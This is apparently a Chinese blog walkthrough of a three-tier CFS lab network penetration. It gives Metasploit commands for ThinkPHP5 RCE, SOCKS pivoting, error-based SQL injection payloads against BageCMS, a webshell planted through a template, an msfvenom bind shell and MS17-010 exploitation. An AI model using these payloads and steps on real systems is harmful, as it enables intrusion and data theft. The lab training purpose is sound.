渗透测试之CFS三层靶机内网渗透

一、环境搭建:

靶机拓扑:

渗透测试之CFS三层靶机内网渗透_第1张图片


 

1.添加虚拟网卡:

添加 22网段(VMnet2) 和 33(VMnet3)网段的网卡

VMnet8为NAT模式与外部通信

渗透测试之CFS三层靶机内网渗透_第2张图片


2.配置网卡:

target1网络配置:

渗透测试之CFS三层靶机内网渗透_第3张图片

target2网络配置:

渗透测试之CFS三层靶机内网渗透_第4张图片

target3网络配置:

渗透测试之CFS三层靶机内网渗透_第5张图片

 3.web靶机搭建(宝塔面板启动)

启动命令: /etc/init.d/bt start

重启 /etc/init.d/bt restart

默认端口管理8888

环境搭建完 kali能ping通target1  target1能ping通target2   target2能ping通target3  三层网络关系

二、渗透测试:

信息收集:

target1(thinkphp5搭建)

渗透测试之CFS三层靶机内网渗透_第6张图片

 使用nmap扫描端口

nmap -sV -p 1-65535 -T4 192.168.234.178

渗透测试之CFS三层靶机内网渗透_第7张图片

因为是thinkphp5  想到远程命令执行 (网上很多利用脚本自行选择 我用msf一把梭)

search thinkphp                (查找可利用exp)
use 0                          (选择exp)
set rhosts 192.168.234.178     (目标target1的ip)
set rport 80                   (目标target1的端口)
set lhost 192.168.234.130      (shell接收ip 这里是kali本机ip)
set lport 4444                 (shell接收端口)
run                            (执行exp)

渗透测试之CFS三层靶机内网渗透_第8张图片

执行返回一个shell  target1拿下

渗透测试之CFS三层靶机内网渗透_第9张图片


信息收集

getuid     
sysinfo
ifconfig

查看ip发现两个ip (22网段是内网网段)

渗透测试之CFS三层靶机内网渗透_第10张图片

使用msf添加路由

run autoroute -s 192.168.22.0         添加22网段路由

run autoroute -p                               查看路由

渗透测试之CFS三层靶机内网渗透_第11张图片

已经添加路由,但是只有返回的这个shell能访问22网段内网靶机;

使用sock4+proxychains4代理打通内网

use auxiliary/server/socks_proxy 
options
set srvhost 192.168.234.130
set version 4a

渗透测试之CFS三层靶机内网渗透_第12张图片 

还需要修改kali /etc/proxychains4.conf文件 (在最后一行添加) 

 渗透测试之CFS三层靶机内网渗透_第13张图片

代理下使用namp扫描 

proxychains4 nmap -Pn -sT 192.168.22.0/24

proxychains4 nmap -Pn -sT 192.168.22.129

渗透测试之CFS三层靶机内网渗透_第14张图片 内网还有web 配置kali浏览器sock代理

渗透测试之CFS三层靶机内网渗透_第15张图片

 渗透测试之CFS三层靶机内网渗透_第16张图片

 使用八哥CMS搭建

 使用gobuster扫描目录 (可以先手工测试,我直接使用工具偷懒,反而错过重要信息)

proxychains4  gobuster dir -u http://192.168.22.129/    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php 

渗透测试之CFS三层靶机内网渗透_第17张图片访问 robots.txt 发现目录  渗透测试之CFS三层靶机内网渗透_第18张图片

 在index.php中发现sql注入提示渗透测试之CFS三层靶机内网渗透_第19张图片

 手工报错注入

 爆数据库名:

index.php?r=vul&keyword=1 ' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+

爆表名:

index.php?r=vul&keyword=1'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="bagecms")),0x7e)) --+

渗透测试之CFS三层靶机内网渗透_第20张图片

最后爆出数据: admin 123qwe

渗透测试之CFS三层靶机内网渗透_第21张图片 

 md5解密后得到后台账号密码 admin 123qwe

登录后台 http://url/index.php?r=admini/default/index

渗透测试之CFS三层靶机内网渗透_第22张图片

 内容模板写入shell渗透测试之CFS三层靶机内网渗透_第23张图片

渗透测试之CFS三层靶机内网渗透_第24张图片

使用AntSword设置代理连接shell

渗透测试之CFS三层靶机内网渗透_第25张图片 

渗透测试之CFS三层靶机内网渗透_第26张图片 信息收集 发现33网段

渗透测试之CFS三层靶机内网渗透_第27张图片

 因为是使用代理访问的22网段的shell 访问不到33网段 所以使用msf生成一个正向

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o test.elf 

 将马子赋执行权限上传到webshell中 同时使用代理开启一个msf

proxychains4 msfconsole 

使用代理的msf开启监听

use exploit/multi/handler                      使用监听模块
set payload linux/x86/meterpreter/bind_tcp     设置payload
set lport   4444                               设置接收端口与msfvenoms生成端口一致
set rhost   192.168.22.129                     设置目标主机(target2)

渗透测试之CFS三层靶机内网渗透_第28张图片

 拿到 target2 shell渗透测试之CFS三层靶机内网渗透_第29张图片


 添加33网段路由

 run autoroute -s 192.168.33.0/24

run autoroute -p

渗透测试之CFS三层靶机内网渗透_第30张图片 

 使用msf扫描模块扫描端口

use auxiliary/scanner/portscan/tcp

 渗透测试之CFS三层靶机内网渗透_第31张图片

 发现 192.168.33.33 主机并开放 445、3389  敏感端口

渗透测试之CFS三层靶机内网渗透_第32张图片

 msf尝试永恒之蓝

use auxiliary/scanner/smb/smb_ms17_010     检测ms17010是否存在

use exploit/windows/smb/ms17_010_psexe     利用ms17010

使用ms17_010_psexe 提示执行成功,但是没有创建会话 (这里不是很明白)

渗透测试之CFS三层靶机内网渗透_第33张图片

use auxiliary/admin/smb/ms17_010_command     这个exp可以执行命令

渗透测试之CFS三层靶机内网渗透_第34张图片


 至此三台靶机shell拿下了,后续还可以进行很多操作,比如windows提权和centos提权;

你可能感兴趣的:(安全,渗透测试)